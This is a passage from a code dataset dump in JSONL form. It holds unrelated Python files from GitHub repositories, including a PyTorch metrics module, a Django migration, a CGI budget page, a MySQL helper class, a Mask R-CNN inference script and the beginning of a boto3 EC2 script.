AuthorizedUserValidator:\n\n @classmethod\n def is_authorize(cls: \"AuthorizedUserValidator\", context: APIGatewayEventRequestContext) -> str:\n cognito_username = context_extractor.extract(context)\n logger.info(\"> get cognito username: %s\", cognito_username)\n\n if not cognito_username:\n raise UserPlatformDemoError(\n ErrorCodeEnum.unauthorized,\n \"Unauthorized user\",\n )\n\n return cognito_username","repo_name":"grleyvaj/aws-manage-users-crud","sub_path":"api/my_lambda/utils/authorized_validator.py","file_name":"authorized_validator.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12408904068","text":"#Question 3 - Nestedn Lists\r\n\r\n#Task\r\n#Given the names and grades for each student in a class of students, \r\n#store them in a nested list and print the name(s) of any student(s) having the second lowest grade.\r\n\r\nif __name__ == '__main__':\r\n records = []\r\n for _ in range(int(input())):\r\n name = input()\r\n score = float(input())\r\n records.append([name, score])\r\n\r\n records = sorted(records, key = lambda x: x[1])\r\n second_lowest_score = sorted(list(set([x[1] for x in records])))[1]\r\n desired_records = []\r\n for stu in records:\r\n if stu[1] == second_lowest_score:\r\n desired_records.append(stu[0])\r\n print(\"\\n\".join(sorted(desired_records)))","repo_name":"Nitheesh1305/Innomatics_Internship_APR_21","sub_path":"Task - 2 (Python Programming)/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69904118569","text":"import torch\nimport src.constants as constants\n\ndef get_batch_right_predictions(outputs, y_targets):\n batch_right_predictions = 0\n\n for index, _ in enumerate(outputs):\n output = outputs[index]\n y = y_targets[index]\n\n batch_right_predictions += get_total_right_predictions(output, y)\n\n return batch_right_predictions\n\ndef get_total_right_predictions(model_output, y_target):\n total_right_predictions = 0\n\n for batch_index in range(constants.BATCH_SIZE):\n model_transposed = model_output[batch_index].transpose(0, 1)\n\n for slice_index in range(constants.SEQUENCE_LENGTH):\n model_prediction = torch.argmax(model_transposed[slice_index])\n target_prediction = y_target[batch_index][slice_index]\n\n if model_prediction == target_prediction:\n total_right_predictions += 1\n\n return total_right_predictions\n\n\ndef get_batch_note_accuracy(outputs, y_targets):\n sample_right_predictions = 0\n\n for index, _ in enumerate(outputs):\n output = outputs[index]\n y = y_targets[index]\n\n sample_right_predictions += get_total_note_accuracy(output, y)\n\n return sample_right_predictions\n\ndef get_total_note_accuracy(model_output, y_target):\n total_right_predictions = 0\n\n for batch_index in range(constants.BATCH_SIZE):\n model_transposed = model_output[batch_index].transpose(0, 1)\n\n for measure_index in range(constants.MEASURES):\n measure_start = measure_index * constants.MEASURE_LENGTH\n measure_end = (measure_index + 1) * constants.MEASURE_LENGTH\n measure_target_notes = y_target[batch_index][measure_start:measure_end]\n\n for sequence_index in range(measure_start, measure_end):\n model_prediction = torch.argmax(model_transposed[sequence_index])\n \n if (model_prediction.item() in measure_target_notes):\n total_right_predictions += 1\n\n return total_right_predictions","repo_name":"arsenaultk9/pytorch-mini-bach-nn-counterpoint","sub_path":"src/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"35489994457","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ct_projects', '0018_auto_20160310_1028'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='notification',\n name='document',\n field=models.ForeignKey(default=None, blank=True, to='ct_projects.Document', null=True),\n ),\n migrations.AlterField(\n model_name='notification',\n name='poll',\n field=models.ForeignKey(default=None, blank=True, to='ct_projects.Poll', null=True),\n ),\n ]\n","repo_name":"cloudteams/CustomerPlatform","sub_path":"ct_projects/migrations/0019_auto_20160321_1200.py","file_name":"0019_auto_20160321_1200.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"36373368902","text":"#!C:\\Python27\\python\nimport cgi\nimport cgitb; cgitb.enable()\nimport datetime\nfrom controlador_usuarios import * #conexion y funciones con la tabla usuarios\nfrom controlador_balance import * #para calcular balances entre ingresos y gastos\nfrom controlador_gastos import * #conexion y funciones con la tabla gastos\n\nprint(\"Content-Type: text/html\\n\")\n\n#Variables de la sesion iniciada\nform = cgi.FieldStorage() \nsesion = form.getfirst('Sesion','empty')\n\n#Objeto controlador de la tabla de usuarios\ntabla_usuarios = ControladorUsuarios()\n\n#Obtenemos el nombre y el id del usuario\ndatos = tabla_usuarios.requerirInformacionUsuario(sesion)\nid_usuario = datos[0][0]\nnombre = datos[0][3]\n\n#Objeto controlador del balance\nmi_balance = ControladorBalance()\n\n#Se toma la fecha de hoy\nhoy = datetime.datetime.now()\nhoy = hoy.isoformat()\nmes = hoy[:7]\nhoy = hoy[:10] \n\n#Titulo y estilo\nprint(\"\"\"\n\t\n\t\n\tBUDGETSOFT Principal\n\t\n\t\n\t\n\t\t\n\n\"\"\"\n) \t\n\n#Encabezado de pagina\nprint (\"\"\"\n\t\n\t
\n\t\"Imagen\n\t

BUDGETSOFT

\n\t
\n\"\"\"\n)\n\n\n#Barra de navegacion\nprint (\"\"\"\n\t
\n\t

Navegacion

\n\t\n\t\t
\n\t\"\"\"\n)\t\t\n\n#Mensaje de bienvenida\nprint (\"\"\"\t\n\t
\n\t\t

Bienvenido, \n\"\"\"\n)\nprint(nombre + '.

')\n\n\n#Grafico de pie\nprint(\"\"\"\n
\n
\n\t

Balance del mes

\t\t\n\"\"\")\n#Se muestra el balance de este mes\nprint('
')\nprint('')\nprint('')\t\nprint('')\nprint('
Balance del mes
')\nprint(mi_balance.obtenerBalance(id_usuario,mes + '-01',hoy))\t\t\nprint('
')\nprint('
')\n\n\n#Se muestran los gastos del dia\nprint (\"\"\"\n\t
\n\t

Gastos de hoy

\n\t
\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\"\"\"\n)\n\n#Objeto controlador de la tabla gastos\ntabla_gastos = ControladorGastos()\n#Buscamos los gastos del usuario\ndatos = tabla_gastos.verGastos(id_usuario,hoy,hoy)\n\n#numero de gastos de hoy\nnum_gastos = 0\n\n#Se imprime la tabla de resultados\nfor result in datos:\n\tresultado= result.fetchall()\n\tfor registro in resultado:\n\t\tprint('')\n\t\tprint('')\n\t\tprint('')\n\t\tprint('')\n\t\tprint('')\n\t\tprint('')\n\t\tnum_gastos = num_gastos + 1\nprint('
MontoCategoriaFechaDescripcion
' + registro[1] + '' + registro[3] + '' + registro[4] + '' + registro[5] + '
')\n\n#Recordatorio de ingresar gastos\nif(num_gastos==0):\n\tprint('

Te recordamos que hoy no has ingresado gastos

')\n\nprint('
')\n\n\n#Funcion que grafica el grafico de pie\nprint(\"\"\"\n
\n\n\n\n\"\"\"\n)\n ","repo_name":"stormvolt/SGPF","sub_path":"sitio_web/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74130516647","text":"# https://github.com/google-research/google-research/tree/master/dense_representations_for_entity_retrieval/mel\nimport os\nimport sys\nimport subprocess\nimport glob\nimport tqdm\nimport json\nimport logging\nimport pandas as pd\n\n\ndef load_annotations(lang):\n mentions = pd.read_csv(root + \"/\" + lang + \"/mentions.tsv\", sep=\"\\t\")\n if \"qid\" in mentions:\n mentions[\"qid\"] = mentions[\"qid\"].str[1:].astype(\"int\")\n else:\n import dawg\n\n for index in glob.glob(f\"../wiki/{lang}wiki-*/index_{lang}wiki-*.dawg\"):\n logging.info(f\"Using {index}\")\n wm = dawg.IntDAWG().load(index)\n mentions[\"qid\"] = mentions[\"url\"].apply(lambda x: wm.get(x[29:], -1))\n mentions = mentions[mentions[\"qid\"] > 0]\n\n docs = {\n docid: open(root + \"/\" + lang + \"/text/\" + docid).read()\n for docid in tqdm.tqdm(set(mentions[\"docid\"]), \"Loading documents\", ncols=80)\n }\n links = mentions.set_index(\"docid\")[[\"mention\", \"qid\"]].sort_index()\n paragraph_annotations = {\n (docid, doc.replace(\"\\n\", \" \")): [tuple(a) for a in links.loc[[docid]].values]\n for docid, doc in tqdm.tqdm(\n docs.items(), desc=\"Collecting annotations\", ncols=80\n )\n }\n return paragraph_annotations\n\n\ndef run(*cmd, cwd=None):\n with subprocess.Popen(\n cmd, stdout=subprocess.PIPE, bufsize=1, universal_newlines=True, cwd=cwd\n ) as p:\n for line in p.stdout:\n print(line, end=\"\")\n if p.returncode:\n raise subprocess.CalledProcessError(p.returncode, p.args)\n\n\nif __name__ == \"__main__\":\n datasets = [\"en\", \"ar\", \"de\", \"es\", \"fa\", \"ja\", \"sr\", \"ta\", \"tr\", \"nl\"]\n root = \"dense_representations_for_entity_retrieval/mel/mewsli-9/output/dataset/\"\n url = \"https://github.com/google-research/google-research/trunk/dense_representations_for_entity_retrieval\"\n\n if not os.path.exists(root):\n os.makedirs(root)\n run(\"svn\", \"export\", \"url\")\n run(\n \"bash\",\n \"get-mewsli-9.sh\",\n cwd=\"dense_representations_for_entity_retrieval/mel\",\n )\n\n bad_ents = set()\n for fname in sys.argv[1:]:\n bad_ents |= set(int(l) for l in open(fname))\n print(f\"Filtering out {len(bad_ents)} bad entities\")\n\n if not os.path.exists(\"Mewsli-9\"):\n os.makedirs(\"Mewsli-9\")\n for lang in datasets:\n print(f\"Making {lang}\")\n annotations = load_annotations(lang)\n\n with open(f\"Mewsli-9/{lang}.tsv\", \"w\") as fw:\n for (code, text), ents in annotations.items():\n ents = json.dumps({s: e for s, e in ents if e not in bad_ents})\n print(str(code), ents, text, sep=\"\\t\", file=fw)\n","repo_name":"bennokr/minimEL","sub_path":"evaluation/make-mewsli9.py","file_name":"make-mewsli9.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39384302142","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import OneHotEncoder\n\npd.options.mode.chained_assignment = None # default='warn'\n\n\nclass BinningTransformer(BaseEstimator, TransformerMixin):\n\n # set new_value to None if Pipeline contains SimpleImputer\n # this is for absences and tardies since some students are\n # transfer students. The placeholder in the CSV is the string \"TRANSFER\"\n def __init__(self, bins=1):\n self.bins = bins\n\n if self.bins == 0:\n raise ValueError(\"Bins cannot be set to 0\")\n\n def fit(self, x, y=None):\n return self\n\n \"\"\"\n Transformers all the values and converts strings and \"TRANSFER\" to something legitimate.\n\n \"\"\"\n\n def transform(self, df):\n\n # for i in [\"A\", \"T\"]:\n # for j in column_list(i, 6, 9):\n # df[j] = df[j].apply(lambda x: int(x / self.bins))\n\n for j in [\"A6\", \"A7\", \"A8\", \"T8\"]:\n df[j] = df[j].apply(lambda x: int(x / self.bins))\n\n return df\n\n\nclass CustomTransformer(BaseEstimator, TransformerMixin):\n\n # set new_value to None if Pipeline contains SimpleImputer\n # this is for absences and tardies since some students are\n # transfer students. The placeholder in the CSV is the string \"TRANSFER\"\n def __init__(self, new_value=0, bins=1, transformation=\"fixed\", using_imputer=False):\n self.new_value = new_value\n self.transformation = transformation\n self.bins = bins\n self.using_imputer = using_imputer\n\n if self.bins == 0:\n raise ValueError(\"Bins cannot be set to 0\")\n\n # if np.isnan(self.new_value) and not self.using_imputer:\n # raise Exception(\"If new_value is nan, then an imputer must be used. If being used, set\",\n # \"using_imputer to True\")\n\n def fit(self, x, y=None):\n return self\n\n \"\"\"\n Transformers all the values and converts strings and \"TRANSFER\" to something legitimate.\n\n \"\"\"\n\n def transform(self, df):\n\n for i in column_list(\"A\", 6, 9):\n if self.transformation == \"fixed\":\n df[i] = df[i].apply(convert_absence_columns, args=(self.new_value, self.bins))\n\n elif self.transformation == \"log\":\n df[i] = df[i].apply(lambda j: np.log((1 + convert_absence_columns(j, self.new_value, self.bins))))\n\n else:\n raise Exception(\"Transformation argument was not correctly assigned.\")\n\n return df\n\n\ndef print_scores(score_array):\n print(\"Scores: \", score_array)\n print(\"Score mean: \", np.mean(score_array))\n print(\"Score variance: \", np.var(score_array))\n\n\n# easy way of accessing A_6, A_7, ... A_N columns\ndef column_list(letter, start, end):\n return [\"%s%d\" % (letter, i) for i in range(start, end)]\n\n\ndef get_column_rates(letter, start, end):\n return [\"%s%d_rate\" % (letter, i) for i in range(start, end)]\n\n\ndef remove_outliers(column, target, lower_bound: float = 0., upper_bound: float = 100.):\n non_outliers = target.between(target.quantile(lower_bound), target.quantile(upper_bound))\n count = 0\n\n for index in range(0, len(column)):\n if ~non_outliers[index]:\n count += 1\n column.drop(index, inplace=True)\n\n print(\"%i outliers were removed\" % count)\n\n return count\n\n\ndef convert_absence_columns(x, new_value=0, bins=1):\n \"\"\"\n Columns that contain \"TRANSFER\" are converted to strings, so they must be converted.\n Also, \"TRANSFER\" cells are considered to be missing values, so they are assigned\n to a new_value.\n \"\"\"\n if x != \"TRANSFER\":\n try:\n return np.floor(int(float(x)) / float(bins))\n except ValueError:\n print(\"Absence cell is neither \\\"TRANSFER\\\" or a number.\")\n\n elif x == \"TRANSFER\":\n return new_value\n\n\ndef run_test(data, target, pipeline, features_=None):\n if features_ is None:\n features_ = [\"A6\", \"A7\", \"A8\"]\n\n scores = -1 * cross_val_score(pipeline,\n data[features_],\n data[target],\n cv=5,\n scoring='neg_mean_absolute_error')\n return scores\n\n\n\"\"\"\nThere are some critical preprocessing that goes on before the test split.\nAlthough it happens before the test split, they are general enough that\nit will not cause data leakage.\n\nCreating a \"AbsencesSum_HS\" column is impossible to do when working with the pipeline.\nThus, it is beyond my control. Therefore, I must transform and impute. The binning is\ndone in the Pipeline, though.\n\"\"\"\n\n\ndef create_student_data(path, lower_bound: float = 0, upper_bound: float = 0.95):\n student_data = pd.read_csv(path)\n\n student_data[\"AbsencesSum_HS\"] = 0\n\n # Pipeline doesn't allow transformations on the target label\n # so I have to do transformations outside of Pipeline in order\n # to sum all absences in High School for each student.\n for j in column_list(\"A\", 9, 13):\n student_data[j] = student_data[j].apply(convert_absence_columns)\n\n student_data[\"AbsencesSum_HS\"] = student_data[column_list('A', 9, 13)].sum(axis=1)\n\n # because we've created the total absences in high school column\n # we are now able to eliminate outliers in the dataset.\n remove_outliers(student_data, student_data[\"AbsencesSum_HS\"], lower_bound, upper_bound)\n\n pre_process = ColumnTransformer(remainder='passthrough',\n transformers=[('categories',\n OneHotEncoder(),\n [\"Gender\", \"IEP/Specialized\"])])\n\n return student_data, pre_process\n\n\n# convert strings to int type even if it's a float\ndef convert_stat(x, new_value=np.nan):\n if not isinstance(x, int):\n\n if not isinstance(x, float) and '.' not in x:\n return new_value if x == \"TRANSFER\" else int(x)\n else:\n return new_value if x == \"TRANSFER\" else int(float(x))\n\n else:\n return x\n\n\ndef get_student_data(path, bin=False):\n dataForGraph = pd.read_csv(path)\n dataForGraph[\"Transferred\"] = dataForGraph[\"A6\"].apply(lambda x: True if x == \"TRANSFER\" else False)\n\n chronic_threshold = 18\n\n # convert absent and tardy columsn to integers\n for i in [\"A\", \"T\"]:\n for j in column_list(i, 6, 13):\n dataForGraph[j] = dataForGraph[j].apply(convert_stat)\n # check median and mean and see what happens!\n dataForGraph[j].fillna(dataForGraph[j].median(), inplace=True)\n\n # hronically absent at least one grade\n dataForGraph[\"ChronicallyAbsent_in_HS\"] = (dataForGraph[\"A9\"] >= chronic_threshold) | \\\n (dataForGraph[\"A10\"] >= chronic_threshold) | \\\n (dataForGraph[\"A11\"] >= chronic_threshold) | \\\n (dataForGraph[\"A12\"] >= chronic_threshold)\n\n dataForGraph['AbsentSum'] = dataForGraph[column_list('A', 6, 13)].sum(axis=1)\n dataForGraph['TardySum'] = dataForGraph[column_list('T', 6, 13)].sum(axis=1)\n\n # for different time periods\n dataForGraph['AbsencesSum_MS'] = dataForGraph[column_list('A', 6, 9)].sum(axis=1)\n dataForGraph['AbsencesSum_HS'] = dataForGraph[column_list('A', 9, 13)].sum(axis=1)\n\n dataForGraph['TardiesSum_MS'] = dataForGraph[column_list('T', 6, 9)].sum(axis=1)\n dataForGraph['TardiesSum_HS'] = dataForGraph[column_list('T', 9, 13)].sum(axis=1)\n\n # Impute the reduced lunch column\n dataForGraph[\"Student on Free or Reduced Lunch\"] = \\\n dataForGraph[\"Student on Free or Reduced Lunch\"].apply(lambda x: \"No\" if pd.isnull(x) else x.strip())\n print(\"Number of students on reduced lunch: {}\".format(\n dataForGraph[dataForGraph[\"Student on Free or Reduced Lunch\"] == \"Yes\"].shape[0]))\n\n # Impute disability column\n dataForGraph[\"Has a Disability?\"].fillna(\"No\", inplace=True)\n dataForGraph[\"Has_504\"] = dataForGraph[\"Has a Disability?\"].apply(lambda x: \"Yes\" if '504' in x else \"No\")\n\n # Calculate Absence Rates\n for k in [\"A\", \"T\"]:\n for column_name in column_list(k, 6, 13):\n dataForGraph[column_name + \"_rate\"] = dataForGraph[column_name] / 180\n\n # chronically absent at least one grade\n dataForGraph[\"ChronicallyAbsent_in_MS\"] = (dataForGraph[\"A6\"] >= chronic_threshold) | \\\n (dataForGraph[\"A7\"] >= chronic_threshold) | \\\n (dataForGraph[\"A8\"] >= chronic_threshold)\n\n # BINNING\n if bin:\n for i in [\"A\", \"T\"]:\n for j in column_list(i, 6, 13):\n dataForGraph[j] = dataForGraph[j].apply(lambda x: int(x / 8))\n\n # remove_outliers(dataForGraph, dataForGraph[\"AbsencesSum_HS\"], 0, 0.95)\n # TODO: Check if this does anyting\n #dataForGraph.reset_index()\n\n return dataForGraph\n","repo_name":"kevinmonisit/Research","sub_path":"model/model_setup.py","file_name":"model_setup.py","file_ext":"py","file_size_in_byte":9101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15020243091","text":"from maskrcnn_benchmark.utils.env import setup_environment # noqa F401 isort:skip\n\nimport argparse\nimport os\nimport json\nimport tempfile\nimport numpy as np\n\nimport torch\nfrom maskrcnn_benchmark.config import cfg\nfrom maskrcnn_benchmark.data import make_data_loader\nfrom maskrcnn_benchmark.engine.inference import inference\nfrom maskrcnn_benchmark.modeling.detector import build_detection_model\nfrom maskrcnn_benchmark.utils.checkpoint import DetectronCheckpointer\nfrom maskrcnn_benchmark.utils.collect_env import collect_env_info\nfrom maskrcnn_benchmark.utils.comm import synchronize, get_rank\nfrom maskrcnn_benchmark.utils.logger import setup_logger\nfrom maskrcnn_benchmark.utils.miscellaneous import mkdir\nfrom maskrcnn_benchmark.engine.extra_utils import coco_results_to_contest, mask_nms\nfrom maskrcnn_benchmark.utils.imports import import_file\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"PyTorch Object Detection Inference\")\n parser.add_argument(\n \"--config-file\",\n default=\"configs/e2e_ms_rcnn_R_50_FPN_1x.yaml\",\n metavar=\"FILE\",\n help=\"path to config file\",\n )\n parser.add_argument(\"--local_rank\", type=int, default=0)\n parser.add_argument(\n \"opts\",\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER,\n )\n\n args = parser.parse_args()\n\n num_gpus = int(os.environ[\"WORLD_SIZE\"]) if \"WORLD_SIZE\" in os.environ else 1\n distributed = num_gpus > 1\n\n if distributed:\n torch.cuda.set_device(args.local_rank)\n torch.distributed.deprecated.init_process_group(\n backend=\"nccl\", init_method=\"env://\"\n )\n\n cfg.merge_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n cfg.freeze()\n\n save_dir = \"\"\n logger = setup_logger(\"maskrcnn_benchmark\", save_dir, get_rank())\n logger.info(\"Using {} GPUs\".format(num_gpus))\n logger.info(cfg)\n\n logger.info(\"Collecting env info (might take some time)\")\n logger.info(\"\\n\" + collect_env_info())\n\n model = build_detection_model(cfg)\n model.to(cfg.MODEL.DEVICE)\n\n output_dir = cfg.OUTPUT_DIR\n checkpointer = DetectronCheckpointer(cfg, model, save_dir=output_dir)\n _ = checkpointer.load(cfg.MODEL.WEIGHT)\n\n iou_types = (\"bbox\",)\n if cfg.MODEL.MASK_ON:\n iou_types = iou_types + (\"segm\",)\n output_folders = [None] * len(cfg.DATASETS.TEST)\n if cfg.OUTPUT_DIR:\n dataset_names = cfg.DATASETS.TEST\n for idx, dataset_name in enumerate(dataset_names):\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\", dataset_name)\n mkdir(output_folder)\n output_folders[idx] = output_folder\n data_loaders_val = make_data_loader(cfg, is_train=False, is_distributed=distributed)\n for output_folder, data_loader_val in zip(output_folders, data_loaders_val):\n _, coco_results, _ = inference(\n model,\n data_loader_val,\n iou_types=iou_types,\n box_only=cfg.MODEL.RPN_ONLY,\n device=cfg.MODEL.DEVICE,\n expected_results=cfg.TEST.EXPECTED_RESULTS,\n expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,\n output_folder=output_folder,\n maskiou_on=cfg.MODEL.MASKIOU_ON\n )\n synchronize()\n\n #############################\n # post-processing\n #############################\n paths_catalog = import_file(\n \"maskrcnn_benchmark.config.paths_catalog\", cfg.PATHS_CATALOG, True\n )\n DatasetCatalog = paths_catalog.DatasetCatalog\n\n output_results, bbox_results = coco_results_to_contest(coco_results)\n if cfg.TEST.VIZ:\n gt_path = os.path.join(DatasetCatalog.DATA_DIR,\n DatasetCatalog.DATASETS[cfg.DATASETS.TEST[0]][1])\n with open(gt_path, 'r') as f:\n gt_results = json.load(f)\n\n # mask_nms\n mmi_thresh = 0.3\n conf_thresh = 0.5 # 0.4\n for idx, (key, result) in enumerate(output_results.items()):\n print(\"[ {} ]/[ {} ]\".format(idx+1, len(output_results)))\n\n output_results[key] = mask_nms(result, result[0]['size'], mmi_thres=mmi_thresh, conf_thres=conf_thresh)\n # viz\n if cfg.TEST.VIZ:\n import cv2\n\n if not os.path.exists(cfg.VIS_DIR):\n os.mkdir(cfg.VIS_DIR)\n img_dir = os.path.join(DatasetCatalog.DATA_DIR,\n DatasetCatalog.DATASETS[cfg.DATASETS.TEST[0]][0])\n\n img = cv2.imread(os.path.join(img_dir, key.replace('res', 'gt')+'.jpg'))\n gt_img = img.copy()\n for rect in bbox_results[key]:\n if rect['confidence'] > conf_thresh:\n pred_pts = rect['points']\n img = cv2.polylines(img, [np.array(pred_pts).astype(np.int32)], True, (0, 255, 0), 3)\n\n for poly in output_results[key]:\n pred_pts = poly['points']\n img = cv2.polylines(img, [np.array(pred_pts).astype(np.int32)], True, (0, 0, 255), 2)\n\n for rect in bbox_results[key]:\n if rect['confidence'] > conf_thresh:\n pred_pts = rect['points']\n img = cv2.putText(img, '{:.4f}'.format(rect['confidence']), (pred_pts[0][0], pred_pts[0][1]),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 0), 2, cv2.LINE_AA)\n img = cv2.putText(img, '{:.4f}'.format(rect['confidence']), (pred_pts[0][0], pred_pts[0][1]),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 1, cv2.LINE_AA)\n\n for gt_poly in gt_results[key.replace('res', 'gt')]['polygons']:\n gt_pts = gt_poly['points']\n if gt_poly['illegibility']:\n gt_img = cv2.polylines(gt_img, [np.array(gt_pts).astype(np.int32)], True, (0, 255, 0), 2)\n else:\n gt_img = cv2.polylines(gt_img, [np.array(gt_pts).astype(np.int32)], True, (0, 0, 255), 2)\n\n img_show = np.concatenate([img, gt_img], axis=1)\n cv2.imwrite(os.path.join(cfg.VIS_DIR, key.replace('res', 'gt')+'.jpg'), img_show)\n\n with tempfile.NamedTemporaryFile() as f:\n file_path = f.name\n if output_folder:\n file_path = os.path.join(output_folder, \"result.json\")\n bbox_file_path = os.path.join(output_folder, \"bbox_result.json\")\n with open(file_path, \"w\") as json_f:\n json.dump(output_results, json_f)\n with open(bbox_file_path, \"w\") as json_ff:\n json.dump(bbox_results, json_ff)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"FudanOCR/FudanOCR","sub_path":"model/detection_model/maskscoring_rcnn/test_net.py","file_name":"test_net.py","file_ext":"py","file_size_in_byte":6645,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"72682669289","text":"import journal.TaskConfig as TC\n\n# import mysql.connector\nfrom impala.util import as_pandas\nimport numpy as np\nimport pyodbc\nimport os\n\n\nclass MySQLConnection():\n\n\n def __init__(self, settings = TC.mysql_connection_settings):\n\n if os.name == 'posix':\n driver_name = 'Devart ODBC Driver for MySQL'\n else:\n driver_name = 'MySQL ODBC 8.0 ANSI Driver'\n\n self.conn = pyodbc.connect('''\n DRIVER={'''+driver_name+'''};\n Server=''' + settings['host'] + ''';\n User='''+settings['username']+''';\n Password=''' + settings['password'] + ''';\n OPTION=3\n ''')\n\n self.cur = self.conn.cursor()\n\n def execute(self, query, n=10):\n\n for i in range(n):\n try:\n self.cur.execute(query)\n except Exception:\n if i == (n-1):\n print(\"Query execution error\")\n pass\n else:\n break\n\n def _getTypeDataSet(self, df):\n impala_types = []\n for name, dtype in zip(df.columns, df.dtypes):\n if \"bool\" in str(dtype):\n impala_types.append('BOOLEAN')\n elif \"float\" in str(dtype):\n impala_types.append('BIGINT')\n elif \"int\" in str(dtype):\n impala_types.append('BIGINT')\n elif \"datetime64\" in str(dtype):\n impala_types.append('TIMESTAMP')\n else:\n impala_types.append('VARCHAR(100)')\n return impala_types\n\n def _createTable(self, df, table, print_q=False):\n\n self.execute('drop table if exists ' + table)\n columns = ', '.join([name + ' ' + impala_type for name, impala_type in zip(df.columns, self._getTypeDataSet(df))])\n query = \"\"\"\n CREATE TABLE \"\"\" + table + \"\"\" (\"\"\" + columns + \"\"\") ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 ;\n \"\"\"\n\n if print_q: print(query)\n self.execute(query)\n\n def loadTableIntoMySQL(self, df, table, partition='', replace=True, print_q=False):\n\n def transform_element(el):\n if el is None:\n el = 'NULL'\n elif isinstance(el, (bool, int, float, np.int64, np.int32, np.int16, np.int)):\n if np.isnan(el):\n el = 'NULL'\n else:\n el = str(el)\n else:\n el = \"'\" + str(el).replace(\"'\", \"\") + \"'\"\n return el\n\n if replace:\n self._createTable(df, table, print_q=print_q)\n\n\n columns = \",\".join(df.columns)\n\n values = \",\".join([\"(\" + \",\".join([transform_element(el) for el in r[1].values]) + \")\" for r in df.iterrows()])\n\n query = \"\"\"INSERT INTO \"\"\" + table + \"\"\" (\"\"\" + columns + \"\"\") \"\"\" + partition + \"\"\" values \"\"\" + values\n\n if print_q: print(query)\n\n self.execute(query)\n\n\ndef main():\n # Loading data from MySQL as an example\n conn = MySQLConnection()\n # in the query below table_name has to be replaced to some existing table\n query = '''\n select * from table_name limit 10\n '''\n conn.execute(query)\n\n res = as_pandas(conn.cur)\n print(res.head())\n\n res.loc[res.shape[0]] = [None, 'TEST']\n\n print('Table is loaded')\n\n # Loading Table into MySQL (another scheme)\n # in the query below schema_name has to be replaced to some existing schema\n conn.loadTableIntoMySQL(res, table='schema_name.test_table', replace=True, print_q=False)\n\n # Deleting created table\n conn.execute('drop table if exists schema_name.test_table')\n\n print('Done')\n\nif __name__ == '__main__':\n\n main()\n\n","repo_name":"Aziko13/DB_classes","sub_path":"MySQLFunctions.py","file_name":"MySQLFunctions.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38796639262","text":"class Solution:\n def floodFill(self, image, sr: int, sc: int, newColor: int):\n m = len(image)\n n = len(image[0])\n z = image[sr][sc]\n if z == newColor:\n return image\n ready = list()\n ready.append((sr, sc))\n image[sr][sc] = newColor\n while ready:\n (i1, j1) = ready.pop(0)\n for (i, j) in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n x = i1 + i\n y = j1 + j\n if 0 <= x < m and 0 <= y < n and image[x][y] == z:\n image[x][y] = newColor\n ready.append((x, y))\n return image\n","repo_name":"saycmily/vtk-and-python","sub_path":"leecode/501-1000/601-1000/733-图像渲染.py","file_name":"733-图像渲染.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15249345076","text":"#!/usr/bin/python3\n\nimport re\nimport sys\n\nlines = []\nfor line in sys.stdin:\n lines.append(line)\n\nfor line in lines:\n line = re.sub(r'\\n$', '', line)\n words = re.split(r'\\s+', line)\n\n for word in words:\n counter = {}\n for char in word:\n char = char.lower() \n \n if char in counter:\n counter[char] += 1\n else:\n counter[char] = 1\n\n times = -1\n equi = True\n\n for char in counter.keys():\n if times == -1:\n times = counter[char]\n else:\n if times != counter[char]:\n equi = False\n break\n \n if equi:\n sys.stdout.write(word)\n sys.stdout.write(' ')\n\n sys.stdout.write('\\n')\n","repo_name":"z3r0sw0rd/COMP2041","sub_path":"test10/equi_filter.py","file_name":"equi_filter.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22623920831","text":"import sys\nimport boto3\nimport botocore\nimport os\nimport click\n\n#If .aws credentials file is in non standard location (~/.aws/credentials) uncomment and provide path\n# os.environ['AWS_SHARED_CREDENTIALS_FILE'] = '/home/ec2-user/environment/acg_py_code/.aws/credentials' \n\nsession = boto3.Session()\nec2 = session.resource('ec2')\n\n# Generic helper fxns\ndef filter_instances(project):\n instances = []\n \n if project:\n print(project)\n filters = [{'Name': 'tag:Name', 'Values': [project]}]\n 